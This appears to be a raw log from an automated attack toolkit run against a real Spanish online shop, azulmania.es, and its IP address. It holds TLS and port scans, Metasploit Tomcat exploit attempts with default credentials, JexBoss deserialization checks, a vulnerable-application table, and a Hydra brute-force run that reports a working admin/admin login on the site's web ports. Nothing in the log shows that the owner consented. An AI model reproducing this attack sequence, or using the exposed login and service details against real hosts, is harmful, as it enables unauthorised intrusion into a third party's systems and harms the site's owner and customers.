2489. https://azulmania.es/es/ [200 OK] Apache, Cookies[PrestaShop-d617857eb8adf9da2917508ed07468ca], Country[FRANCE][FR], Google-Analytics[Universal][UA-31263279-1], HTML5, HTTPServer[Apache], HttpOnly[PrestaShop-d617857eb8adf9da2917508ed07468ca], IP[91.121.2.184], MetaGenerator[PrestaShop], PHP[5.6.14], PrestaShop, Script[text/javascript], Title[Azulmanía - Azulmanía], UncommonHeaders[powered-by], X-Powered-By[PHP/5.6.14]
2490. #######################################################################################################################################
2491.  
2492. AVAILABLE PLUGINS
2493. -----------------
2494.  
2495. PluginSessionResumption
2496. PluginCertInfo
2497. PluginOpenSSLCipherSuites
2498. PluginCompression
2499. PluginChromeSha1Deprecation
2500. PluginHSTS
2501. PluginHeartbleed
2502. PluginSessionRenegotiation
2503.  
2504.  
2505.  
2506. CHECKING HOST(S) AVAILABILITY
2507. -----------------------------
2508.  
2509. 91.121.2.184:443 => 91.121.2.184:443
2510.  
2511.  
2512.  
2513. SCAN RESULTS FOR 91.121.2.184:443 - 91.121.2.184:443
2514. ----------------------------------------------------
2515.  
2516. * Deflate Compression:
2517. OK - Compression disabled
2518.  
2519. * Session Renegotiation:
2520. Client-initiated Renegotiations: OK - Rejected
2521. Secure Renegotiation: OK - Supported
2522.  
2523. * Certificate - Content:
2524. SHA1 Fingerprint: b9fb2f963ee488b751d1bc5303f98a1902d98391
2525. Common Name: azulmania.es
2526. Issuer: Let's Encrypt Authority X3
2527. Serial Number: 036C5368A46E57F0DB2D572C1E898A2E1A50
2528. Not Before: Oct 30 14:38:09 2018 GMT
2529. Not After: Jan 28 14:38:09 2019 GMT
2530. Signature Algorithm: sha256WithRSAEncryption
2531. Public Key Algorithm: rsaEncryption
2532. Key Size: 2048 bit
2533. Exponent: 65537 (0x10001)
2534. X509v3 Subject Alternative Name: {'DNS': ['azulmania.es']}
2535.  
2536. * Certificate - Trust:
2537. Hostname Validation: FAILED - Certificate does NOT match 91.121.2.184
2538. Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
2539. Java 6 CA Store (Update 65): OK - Certificate is trusted
2540. Microsoft CA Store (09/2015): OK - Certificate is trusted
2541. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
2542. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
2543. Certificate Chain Received: ['azulmania.es', 'azulmania.es', "Let's Encrypt Authority X3"]
2544.  
2545. * Certificate - OCSP Stapling:
2546. NOT SUPPORTED - Server did not send back an OCSP response.
2547.  
2548. * Session Resumption:
2549. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
2550. With TLS Session Tickets: OK - Supported
2551.  
2552. * SSLV2 Cipher Suites:
2553. Server rejected all cipher suites.
2554.  
2555. * SSLV3 Cipher Suites:
2556. Server rejected all cipher suites.
2557.  
2558.  
2559.  
2560. SCAN COMPLETED IN 2.30 S
2561. ------------------------
2562. Version: 1.11.12-static
2563. OpenSSL 1.0.2-chacha (1.0.2g-dev)
2564.  
2565. Connected to 91.121.2.184
2566.  
2567. Testing SSL server 91.121.2.184 on port 443 using SNI name 91.121.2.184
2568.  
2569. TLS Fallback SCSV:
2570. Server supports TLS Fallback SCSV
2571.  
2572. TLS renegotiation:
2573. Secure session renegotiation supported
2574.  
2575. TLS Compression:
2576. Compression disabled
2577.  
2578. Heartbleed:
2579. TLS 1.2 not vulnerable to heartbleed
2580. TLS 1.1 not vulnerable to heartbleed
2581. TLS 1.0 not vulnerable to heartbleed
2582.  
2583. Supported Server Cipher(s):
2584. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
2585. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
2586. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
2587. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
2588. Accepted TLSv1.2 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
2589. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
2590. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
2591. Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 1024 bits
2592. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 1024 bits
2593. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
2594. Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 1024 bits
2595. Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 1024 bits
2596. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 1024 bits
2597. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
2598. Accepted TLSv1.2 128 bits DHE-RSA-SEED-SHA DHE 1024 bits
2599. Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 1024 bits
2600. Accepted TLSv1.2 128 bits RC4-SHA
2601. Preferred TLSv1.1 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
2602. Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
2603. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
2604. Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
2605. Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 1024 bits
2606. Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
2607. Accepted TLSv1.1 128 bits DHE-RSA-SEED-SHA DHE 1024 bits
2608. Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 1024 bits
2609. Accepted TLSv1.1 128 bits RC4-SHA
2610. Preferred TLSv1.0 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
2611. Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
2612. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
2613. Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
2614. Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 1024 bits
2615. Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
2616. Accepted TLSv1.0 128 bits DHE-RSA-SEED-SHA DHE 1024 bits
2617. Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 1024 bits
2618. Accepted TLSv1.0 128 bits RC4-SHA
2619.  
2620. SSL Certificate:
2621. Signature Algorithm: sha256WithRSAEncryption
2622. RSA Key Strength: 2048
2623.  
2624. Subject: azulmania.es
2625. Altnames: DNS:azulmania.es
2626. Issuer: Let's Encrypt Authority X3
2627.  
2628. Not valid before: Oct 30 14:38:09 2018 GMT
2629. Not valid after: Jan 28 14:38:09 2019 GMT
2630. #######################################################################################################################################
2631. ^ ^
2632. _ __ _ ____ _ __ _ _ ____
2633. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
2634. | V V // o // _/ | V V // 0 // 0 // _/
2635. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
2636. <
2637. ...'
2638.  
2639. WAFW00F - Web Application Firewall Detection Tool
2640.  
2641. By Sandro Gauci && Wendel G. Henrique
2642.  
2643. Checking http://91.121.2.184:8080
2644.  
2645. http://91.121.2.184:8080 [ Unassigned]
2646.  
2647. Version: 1.11.12-static
2648. OpenSSL 1.0.2-chacha (1.0.2g-dev)
2649.  
2650. Connected to 91.121.2.184
2651.  
2652. Testing SSL server 91.121.2.184 on port 8080 using SNI name 91.121.2.184
2653.  
2654. TLS Fallback SCSV:
2655. Server does not support TLS Fallback SCSV
2656.  
2657. TLS renegotiation:
2658. Session renegotiation not supported
2659.  
2660. TLS Compression:
2661. Compression disabled
2662.  
2663. Heartbleed:
2664. TLS 1.2 not vulnerable to heartbleed
2665. TLS 1.1 not vulnerable to heartbleed
2666. TLS 1.0 not vulnerable to heartbleed
2667. #######################################################################################################################################
2668. RHOSTS => 91.121.2.184
2669. RHOST => 91.121.2.184
2670. [-] WAR file not found
2671. [*] Auxiliary module execution completed
2672. [*] Scanned 1 of 1 hosts (100% complete)
2673. [*] Auxiliary module execution completed
2674. RPORT => 8080
2675. [*] Scanned 1 of 1 hosts (100% complete)
2676. [*] Auxiliary module execution completed
2677. [*] Attempting to connect to 91.121.2.184:8080
2678. [*] Scanned 1 of 1 hosts (100% complete)
2679. [*] Auxiliary module execution completed
2680. [*] http://91.121.2.184:8080/admin/j_security_check - Checking j_security_check...
2681. [*] Scanned 1 of 1 hosts (100% complete)
2682. [*] Auxiliary module execution completed
2683. [*] Scanned 1 of 1 hosts (100% complete)
2684. [*] Auxiliary module execution completed
2685. [-] Exploit aborted due to failure: unreachable: The target server did not respond to fingerprinting, use 'set FingerprintCheck false' to disable this check.
2686. [*] Exploit completed, but no session was created.
2687. USERNAME => tomcat
2688. PASSWORD => tomcat
2689. [-] Exploit aborted due to failure: unreachable: The target server did not respond to fingerprinting, use 'set FingerprintCheck false' to disable this check.
2690. [*] Exploit completed, but no session was created.
2691. #######################################################################################################################################
2692.  
2693.  
2694.  
2695. * --- JexBoss: Jboss verify and EXploitation Tool --- *
2696. | * And others Java Deserialization Vulnerabilities * |
2697. | |
2698. | @author: João Filho Matos Figueiredo |
2699. | @contact: joaomatosf@gmail.com |
2700. | |
2701. | @update: https://github.com/joaomatosf/jexboss |
2702. #______________________________________________________#
2703.  
2704. @version: 1.2.4
2705.  
2706. * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
2707.  
2708.  
2709. ** Checking Host: http://91.121.2.184:8080 **
2710.  
2711. [*] Checking admin-console:
2712. * An error occurred while connecting to the host http://91.121.2.184:8080 (HTTPConnectionPool(host='91.121.2.184', port=8080): Max retries exceeded with url: /admin-console//github.com/joaomatosf/jexboss (Caused by ProtocolError("Connection broken: error(104, 'Connection reset by peer')", error(104, 'Connection reset by peer'))))
2713.  
2714. [*] Checking Struts2:
2715. * An error occurred while connecting to the host http://91.121.2.184:8080 (HTTPConnectionPool(host='91.121.2.184', port=8080): Max retries exceeded with url: / (Caused by ProtocolError("Connection broken: error(104, 'Connection reset by peer')", error(104, 'Connection reset by peer'))))
2716.  
2717. [*] Checking Servlet Deserialization:
2718. * An error occurred while connecting to the host http://91.121.2.184:8080 (HTTPConnectionPool(host='91.121.2.184', port=8080): Max retries exceeded with url: / (Caused by ProtocolError("Connection broken: error(104, 'Connection reset by peer')", error(104, 'Connection reset by peer'))))
2719.  
2720. [*] Checking Application Deserialization:
2721. * An error occurred while connecting to the host http://91.121.2.184:8080 (HTTPConnectionPool(host='91.121.2.184', port=8080): Max retries exceeded with url: / (Caused by ProtocolError("Connection broken: error(104, 'Connection reset by peer')", error(104, 'Connection reset by peer'))))
2722.  
2723. [*] Checking Jenkins:
2724. * An error occurred while connecting to the host http://91.121.2.184:8080 (HTTPConnectionPool(host='91.121.2.184', port=8080): Max retries exceeded with url: / (Caused by ProtocolError("Connection broken: error(104, 'Connection reset by peer')", error(104, 'Connection reset by peer'))))
2725.  
2726. [*] Checking web-console: [ ERROR ]
2727. * The server http://91.121.2.184:8080 is not an HTTP server.
2728.  
2729.  
2730.  
2731. * Results:
2732. The server is not vulnerable to bugs tested ... :D
2733.  
2734. * Info: review, suggestions, updates, etc:
2735. https://github.com/joaomatosf/jexboss
2736.  
2737. * DONATE: Please consider making a donation to help improve this tool,
2738. * Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C
2739.  
2740. #######################################################################################################################################
2741.  
2742. I, [2018-11-07T17:28:29.047883 #16209] INFO -- : Initiating port scan
2743. I, [2018-11-07T17:29:17.069699 #16209] INFO -- : Using nmap scan output file logs/nmap_output_2018-11-07_17-28-29.xml
2744. I, [2018-11-07T17:29:17.071369 #16209] INFO -- : Discovered open port: 91.121.2.184:80
2745. I, [2018-11-07T17:29:17.806127 #16209] INFO -- : Discovered open port: 91.121.2.184:443
2746. I, [2018-11-07T17:29:19.020573 #16209] INFO -- : Discovered open port: 91.121.2.184:465
2747. I, [2018-11-07T17:29:25.958981 #16209] INFO -- : Discovered open port: 91.121.2.184:993
2748. I, [2018-11-07T17:29:26.431011 #16209] INFO -- : Discovered open port: 91.121.2.184:60443
2749. I, [2018-11-07T17:29:27.472535 #16209] INFO -- : <<<Enumerating vulnerable applications>>>
2750.  
2751.  
2752. --------------------------------------------------------
2753. <<<Yasuo discovered following vulnerable applications>>>
2754. --------------------------------------------------------
2755. +----------------------------+------------------------------------------+------------------------------------------------+----------+----------+
2756. | App Name | URL to Application | Potential Exploit | Username | Password |
2757. +----------------------------+------------------------------------------+------------------------------------------------+----------+----------+
2758. | Plixer Scrutinizer NetFlow | http://91.121.2.184:80/cgi-bin/admin.cgi | ./auxiliary/admin/http/scrutinizer_add_user.rb | | |
2759. +----------------------------+------------------------------------------+------------------------------------------------+----------+----------+
2760. ######################################################################################################################################
2761. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:32 EST
2762. NSE: Loaded 148 scripts for scanning.
2763. NSE: Script Pre-scanning.
2764. Initiating NSE at 17:32
2765. Completed NSE at 17:32, 0.00s elapsed
2766. Initiating NSE at 17:32
2767. Completed NSE at 17:32, 0.00s elapsed
2768. Initiating Parallel DNS resolution of 1 host. at 17:32
2769. Completed Parallel DNS resolution of 1 host. at 17:32, 16.50s elapsed
2770. Initiating SYN Stealth Scan at 17:32
2771. Scanning 91.121.2.184 [474 ports]
2772. Discovered open port 80/tcp on 91.121.2.184
2773. Discovered open port 8080/tcp on 91.121.2.184
2774. Discovered open port 993/tcp on 91.121.2.184
2775. Discovered open port 443/tcp on 91.121.2.184
2776. Discovered open port 22/tcp on 91.121.2.184
2777. Discovered open port 389/tcp on 91.121.2.184
2778. Discovered open port 465/tcp on 91.121.2.184
2779. Discovered open port 7071/tcp on 91.121.2.184
2780. Completed SYN Stealth Scan at 17:32, 4.31s elapsed (474 total ports)
2781. Initiating Service scan at 17:32
2782. Scanning 8 services on 91.121.2.184
2783. Completed Service scan at 17:33, 21.22s elapsed (8 services on 1 host)
2784. Initiating OS detection (try #1) against 91.121.2.184
2785. Retrying OS detection (try #2) against 91.121.2.184
2786. Initiating Traceroute at 17:33
2787. Completed Traceroute at 17:33, 0.12s elapsed
2788. Initiating Parallel DNS resolution of 2 hosts. at 17:33
2789. Completed Parallel DNS resolution of 2 hosts. at 17:33, 16.50s elapsed
2790. NSE: Script scanning 91.121.2.184.
2791. Initiating NSE at 17:33
2792. Completed NSE at 17:36, 182.65s elapsed
2793. Initiating NSE at 17:36
2794. Completed NSE at 17:36, 1.13s elapsed
2795. Nmap scan report for 91.121.2.184
2796. Host is up (0.11s latency).
2797. Not shown: 463 filtered ports
2798. PORT STATE SERVICE VERSION
2799. 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
2800. | ssh-hostkey:
2801. | 1024 e4:7e:99:a4:23:fd:8c:a3:e7:a5:1f:21:8c:e8:68:0f (DSA)
2802. |_ 2048 cf:fd:6c:82:51:78:63:3c:c0:33:e0:ab:05:9e:af:07 (RSA)
2803. 25/tcp closed smtp
2804. 80/tcp open http Apache httpd (PHP 5.6.14)
2805. | http-methods:
2806. |_ Supported Methods: GET HEAD POST OPTIONS
2807. | http-robots.txt: 83 disallowed entries (15 shown)
2808. | /*?orderby= /*?orderway= /*?tag= /*?id_currency=
2809. | /*?search_query= /*?back= /*?n= /*&orderby= /*&orderway= /*&tag=
2810. | /*&id_currency= /*&search_query= /*&back= /*&n=
2811. |_/*controller=addresses
2812. |_http-server-header: Apache
2813. |_http-title: Did not follow redirect to http://azulmania.es/
2814. 139/tcp closed netbios-ssn
2815. 389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
2816. | ssl-cert: Subject: commonName=ks37079.kimsufi.com/organizationName=Zimbra Collaboration Server/stateOrProvinceName=N/A/countryName=US
2817. | Issuer: commonName=ks37079.kimsufi.com/organizationName=Zimbra Collaboration Server/stateOrProvinceName=N/A/countryName=US
2818. | Public Key type: rsa
2819. | Public Key bits: 1024
2820. | Signature Algorithm: sha1WithRSAEncryption
2821. | Not valid before: 2013-12-09T09:57:56
2822. | Not valid after: 2018-12-08T09:57:56
2823. | MD5: 922f 71f8 2bf1 f953 ff2f 28d6 903f a524
2824. |_SHA-1: 5aa2 2e6f 9c8b 2556 b75c 87e0 f34a c1ce 2ee3 85a1
2825. |_ssl-date: TLS randomness does not represent time
2826. 443/tcp open ssl/http Apache httpd (PHP 5.6.14)
2827. | http-methods:
2828. |_ Supported Methods: GET HEAD POST OPTIONS
2829. | http-robots.txt: 83 disallowed entries (15 shown)
2830. | /*?orderby= /*?orderway= /*?tag= /*?id_currency=
2831. | /*?search_query= /*?back= /*?n= /*&orderby= /*&orderway= /*&tag=
2832. | /*&id_currency= /*&search_query= /*&back= /*&n=
2833. |_/*controller=addresses
2834. |_http-server-header: Apache
2835. |_http-title: Did not follow redirect to http://azulmania.es/
2836. | ssl-cert: Subject: commonName=azulmania.es
2837. | Subject Alternative Name: DNS:azulmania.es
2838. | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
2839. | Public Key type: rsa
2840. | Public Key bits: 2048
2841. | Signature Algorithm: sha256WithRSAEncryption
2842. | Not valid before: 2018-10-30T14:38:09
2843. | Not valid after: 2019-01-28T14:38:09
2844. | MD5: 7cc6 2d40 ca18 f165 624a 7ee8 4560 7a18
2845. |_SHA-1: b9fb 2f96 3ee4 88b7 51d1 bc53 03f9 8a19 02d9 8391
2846. |_ssl-date: 2018-11-07T22:33:32+00:00; 0s from scanner time.
2847. 445/tcp closed microsoft-ds
2848. 465/tcp open ssl/smtps?
2849. |_smtp-commands: Couldn't establish connection on port 465
2850. |_ssl-date: TLS randomness does not represent time
2851. 993/tcp open ssl/imaps?
2852. |_ssl-date: TLS randomness does not represent time
2853. 7071/tcp open ssl/iwg1?
2854. |_ssl-date: 2018-11-07T22:33:32+00:00; 0s from scanner time.
2855. 8080/tcp open ssh OpenSSH 5.3 (protocol 2.0)
2856. | ssh-hostkey:
2857. | 1024 e4:7e:99:a4:23:fd:8c:a3:e7:a5:1f:21:8c:e8:68:0f (DSA)
2858. |_ 2048 cf:fd:6c:82:51:78:63:3c:c0:33:e0:ab:05:9e:af:07 (RSA)
2859. Device type: general purpose|storage-misc|WAP|broadband router|router|media device
2860. Running (JUST GUESSING): Linux 2.6.X|3.X (94%), HP embedded (91%), Ubiquiti embedded (90%), MikroTik RouterOS 6.X (89%), Infomir embedded (89%), Netgear RAIDiator 4.X (89%)
2861. OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/h:hp:p2000_g3 cpe:/h:ubnt:airmax_nanostation cpe:/o:mikrotik:routeros:6.19 cpe:/o:linux:linux_kernel:2.6 cpe:/h:infomir:mag-250 cpe:/o:netgear:raidiator:4.2.21
2862. Aggressive OS guesses: Linux 2.6.32 (94%), Linux 2.6.32 - 3.13 (94%), Linux 2.6.32 - 3.1 (93%), Linux 2.6.32 - 2.6.39 (92%), Linux 2.6.39 (92%), Linux 3.10 (92%), HP P2000 G3 NAS device (91%), Linux 3.2 (91%), Linux 3.11 (91%), Linux 3.5 (91%)
2863. No exact OS matches for host (test conditions non-ideal).
2864. Uptime guess: 21.259 days (since Wed Oct 17 12:24:18 2018)
2865. Network Distance: 2 hops
2866. TCP Sequence Prediction: Difficulty=254 (Good luck!)
2867. IP ID Sequence Generation: All zeros
2868.  
2869. TRACEROUTE (using port 445/tcp)
2870. HOP RTT ADDRESS
2871. 1 107.37 ms 10.251.200.1
2872. 2 107.15 ms 91.121.2.184
2873.  
2874. NSE: Script Post-scanning.
2875. Initiating NSE at 17:36
2876. Completed NSE at 17:36, 0.00s elapsed
2877. Initiating NSE at 17:36
2878. Completed NSE at 17:36, 0.00s elapsed
2879. Read data files from: /usr/bin/../share/nmap
2880. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
2881. Nmap done: 1 IP address (1 host up) scanned in 247.95 seconds
2882. Raw packets sent: 1030 (49.474KB) | Rcvd: 3347 (2.272MB)
2883. #######################################################################################################################################
2884. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:36 EST
2885. NSE: Loaded 148 scripts for scanning.
2886. NSE: Script Pre-scanning.
2887. Initiating NSE at 17:36
2888. Completed NSE at 17:36, 0.00s elapsed
2889. Initiating NSE at 17:36
2890. Completed NSE at 17:36, 0.00s elapsed
2891. Initiating Parallel DNS resolution of 1 host. at 17:36
2892. Completed Parallel DNS resolution of 1 host. at 17:36, 16.50s elapsed
2893. Initiating UDP Scan at 17:36
2894. Scanning 91.121.2.184 [14 ports]
2895. Completed UDP Scan at 17:36, 2.80s elapsed (14 total ports)
2896. Initiating Service scan at 17:36
2897. Scanning 12 services on 91.121.2.184
2898. Service scan Timing: About 8.33% done; ETC: 17:56 (0:17:58 remaining)
2899. Completed Service scan at 17:38, 102.58s elapsed (12 services on 1 host)
2900. Initiating OS detection (try #1) against 91.121.2.184
2901. Retrying OS detection (try #2) against 91.121.2.184
2902. Initiating Traceroute at 17:38
2903. Completed Traceroute at 17:38, 7.16s elapsed
2904. Initiating Parallel DNS resolution of 1 host. at 17:38
2905. Completed Parallel DNS resolution of 1 host. at 17:39, 16.50s elapsed
2906. NSE: Script scanning 91.121.2.184.
2907. Initiating NSE at 17:39
2908. Completed NSE at 17:39, 20.36s elapsed
2909. Initiating NSE at 17:39
2910. Completed NSE at 17:39, 1.03s elapsed
2911. Nmap scan report for 91.121.2.184
2912. Host is up (0.11s latency).
2913.  
2914. PORT STATE SERVICE VERSION
2915. 53/udp open|filtered domain
2916. 67/udp open|filtered dhcps
2917. 68/udp open|filtered dhcpc
2918. 69/udp open|filtered tftp
2919. 88/udp open|filtered kerberos-sec
2920. 123/udp open|filtered ntp
2921. 137/udp filtered netbios-ns
2922. 138/udp filtered netbios-dgm
2923. 139/udp open|filtered netbios-ssn
2924. 161/udp open|filtered snmp
2925. 162/udp open|filtered snmptrap
2926. 389/udp open|filtered ldap
2927. 520/udp open|filtered route
2928. 2049/udp open|filtered nfs
2929. Too many fingerprints match this host to give specific OS details
2930.  
2931. TRACEROUTE (using port 137/udp)
2932. HOP RTT ADDRESS
2933. 1 104.87 ms 10.251.200.1
2934. 2 ... 3
2935. 4 103.93 ms 10.251.200.1
2936. 5 105.82 ms 10.251.200.1
2937. 6 105.80 ms 10.251.200.1
2938. 7 105.65 ms 10.251.200.1
2939. 8 105.65 ms 10.251.200.1
2940. 9 105.65 ms 10.251.200.1
2941. 10 105.65 ms 10.251.200.1
2942. 11 ... 18
2943. 19 102.58 ms 10.251.200.1
2944. 20 105.38 ms 10.251.200.1
2945. 21 ... 28
2946. 29 105.02 ms 10.251.200.1
2947. 30 107.64 ms 10.251.200.1
2948.  
2949. NSE: Script Post-scanning.
2950. Initiating NSE at 17:39
2951. Completed NSE at 17:39, 0.00s elapsed
2952. Initiating NSE at 17:39
2953. Completed NSE at 17:39, 0.00s elapsed
2954. Read data files from: /usr/bin/../share/nmap
2955. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
2956. Nmap done: 1 IP address (1 host up) scanned in 170.80 seconds
2957. Raw packets sent: 135 (11.658KB) | Rcvd: 5455 (1.759MB)
2958. #######################################################################################################################################
2959. __________ __ ____ ___
2960. \______ \_______ __ ___/ |_ ____ \ \/ /
2961. | | _/\_ __ \ | \ __\/ __ \ \ /
2962. | | \ | | \/ | /| | \ ___/ / \
2963. |______ / |__| |____/ |__| \___ >___/\ \
2964. \/ \/ \_/
2965.  
2966. + -- --=[BruteX v1.7 by 1N3
2967. + -- --=[http://crowdshield.com
2968.  
2969.  
2970. ###################################################################################### Running Port Scan ##############################
2971. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:39 EST
2972. Nmap scan report for 91.121.2.184
2973. Host is up (0.11s latency).
2974. Not shown: 17 filtered ports, 3 closed ports
2975. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
2976. PORT STATE SERVICE
2977. 22/tcp open ssh
2978. 80/tcp open http
2979. 389/tcp open ldap
2980. 443/tcp open https
2981. 993/tcp open imaps
2982. 8080/tcp open http-proxy
2983.  
2984. Nmap done: 1 IP address (1 host up) scanned in 18.20 seconds
2985.  
2986. ################################### Running Brute Force ###############################################################################
2987.  
2988. + -- --=[Port 21 closed... skipping.
2989. + -- --=[Port 22 opened... running tests...
2990. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
2991.  
2992. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:39:44
2993. [DATA] max 1 task per 1 server, overall 1 task, 363 login tries, ~363 tries per task
2994. [DATA] attacking ssh://91.121.2.184:22/
2995. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
2996.  
2997. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:39:48
2998. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
2999. [DATA] attacking ssh://91.121.2.184:22/
3000. + -- --=[Port 23 closed... skipping.
3001. + -- --=[Port 25 closed... skipping.
3002. + -- --=[Port 80 opened... running tests...
3003. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
3004.  
3005. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:39:52
3006. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
3007. [DATA] attacking http-get://91.121.2.184:80//
3008. [80][http-get] host: 91.121.2.184 login: admin password: admin
3009. [STATUS] attack finished for 91.121.2.184 (valid pair found)
3010. 1 of 1 target successfully completed, 1 valid password found
3011. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-07 17:39:53
3012. + -- --=[Port 110 closed... skipping.
3013. + -- --=[Port 139 closed... skipping.
3014. + -- --=[Port 162 closed... skipping.
3015. + -- --=[Port 389 opened... running tests...
3016. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
3017.  
3018. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:39:53
3019. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
3020.  
3021. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:39:53
3022. + -- --=[Port 443 opened... running tests...
3023. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
3024.  
3025. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:39:53
3026. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
3027. [DATA] attacking http-gets://91.121.2.184:443//
3028. [443][http-get] host: 91.121.2.184 login: admin password: admin
3029. [STATUS] attack finished for 91.121.2.184 (valid pair found)
3030. 1 of 1 target successfully completed, 1 valid password found
3031. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-07 17:39:54
3032. + -- --=[Port 445 closed... skipping.
3033. + -- --=[Port 512 closed... skipping.
3034. + -- --=[Port 513 closed... skipping.
3035. + -- --=[Port 514 closed... skipping.
3036. + -- --=[Port 993 opened... running tests...
3037. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
3038.  
3039. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:39:54
3040. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
3041. [DATA] attacking imaps://91.121.2.184:993/993
3042. [STATUS] 133.00 tries/min, 133 tries in 00:01h, 1400 to do in 00:11h, 1 active
3043. [STATUS] 133.67 tries/min, 401 tries in 00:03h, 1132 to do in 00:09h, 1 active
3044. [STATUS] 133.29 tries/min, 933 tries in 00:07h, 600 to do in 00:05h, 1 active
3045. 1 of 1 target completed, 0 valid passwords found
3046. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-07 17:51:25
3047. + -- --=[Port 1433 closed... skipping.
3048. + -- --=[Port 1521 closed... skipping.
3049. + -- --=[Port 3306 closed... skipping.
3050. + -- --=[Port 3389 closed... skipping.
3051. + -- --=[Port 5432 closed... skipping.
3052. + -- --=[Port 5900 closed... skipping.
3053. + -- --=[Port 5901 closed... skipping.
3054. + -- --=[Port 8000 closed... skipping.
3055. + -- --=[Port 8080 opened... running tests...
3056. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
3057.  
3058. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:51:25
3059. + -- --=[Port 8100 closed... skipping.
3060. + -- --=[Port 6667 closed... skipping.
3061. #######################################################################################################################################
3062.  
3063. * default
3064. * default
3065. [*] Importing 'Nmap XML' data
3066. [*] Import: Parsing with 'Nokogiri v1.8.5'
3067. [*] Importing host 91.121.2.184
3068. [*] Successfully imported /usr/share/sniper/loot/91.121.2.184/nmap/nmap-91.121.2.184-udp.xml
3069. [*] Importing 'Nmap XML' data
3070. [*] Import: Parsing with 'Nokogiri v1.8.5'
3071. [*] Importing host 91.121.2.184
3072. [*] Successfully imported /usr/share/sniper/loot/91.121.2.184/nmap/nmap-udp-91.121.2.184.xml
3073. [*] Importing 'Nmap XML' data
